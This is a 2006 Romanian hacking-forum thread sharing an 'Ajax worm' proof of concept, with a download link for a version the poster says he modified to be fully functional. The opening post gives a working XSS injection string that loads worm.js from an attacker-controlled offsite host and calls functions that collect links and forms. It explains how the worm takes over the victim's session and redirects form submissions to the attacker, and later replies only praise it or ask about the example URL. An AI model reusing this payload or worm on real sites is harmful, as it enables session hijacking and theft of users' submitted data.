SlicK Posted December 20, 2006 Report Share Posted December 20, 2006 Vierme Ajax Proof of Concept.Credits: Anurag Agarwal, Download:'>http://www.attacklabs.comDownload: Utilizare:-Fisierul'>http://www.rootb0x.com/worm.rarUtilizare:-Fisierul "worm.js" trebuie pus intr-o locatie offsite (de ex: -Printr-un'>http://siteulmeu.com/worm.js"-Printr-un XSS injectam viermele in sesiunea utilizatorului care nu banuieste nimic de ex: http://www.sitevulnerabil.com/app.php?id=<script src="http://siteulmeu.com/worm.js"></script><script language="javascript">create_object(); collect_links(); collect_forms();</script>-odata injectat viermele preia controlul total asupra sesiunii utilizatorului: inlocuieste fiecare link de pe pagina cu propria sa functie. atunci cand userul da click pe un link "infectat" viermele face un request catre acea pagina si o afiseaza userului infectand totodata si acea pagina. Inlocuieste proprietatea "action" a fiecarui formular cu o functie proprie. Atunci cand userul da submit pe acel formular datele introduse pot fi trimise intr-o locatie offsite controlata de atacator apoi isi continua activitatea in mod normal.Momentan viermele nu se poate raspandi in afara siteului unde a fost injectat initial, deasemenea din cate am vazut nu functioneaza pe pagini secure(https)Pentru informatii aditionale vizitati pagina autorului.PS: fisierul postat de mine a fost modificat fata de versiunea originala pentru a fi complet functional. Quote Link to comment Share on other sites More sharing options...
Guest flama Posted December 20, 2006 Report Share Posted December 20, 2006 elegant ... mersi Quote Link to comment Share on other sites More sharing options...
mozi Posted December 20, 2006 Report Share Posted December 20, 2006 imi place .. Quote Link to comment Share on other sites More sharing options...
bossjuan Posted December 20, 2006 Report Share Posted December 20, 2006 http://www.sitevulnerabil.com/app.php si la asta app.php ce inseamna ce script e acolo? Quote Link to comment Share on other sites More sharing options...
Guest flama Posted December 20, 2006 Report Share Posted December 20, 2006 bossjuan wrote: http://www.sitevulnerabil.com/app.php si la asta app.php ce inseamna ce script e acolo?vezi tutoriale xss Quote Link to comment Share on other sites More sharing options...
bossjuan Posted December 20, 2006 Report Share Posted December 20, 2006 mai lamurit Quote Link to comment Share on other sites More sharing options...
SlicK Posted December 20, 2006 Author Report Share Posted December 20, 2006 bossjuan "http://www.sitevulnerabil.com/app.php" este doar un exemplu reprezentand o aplicatie vulnerabila la xss. Quote Link to comment Share on other sites More sharing options...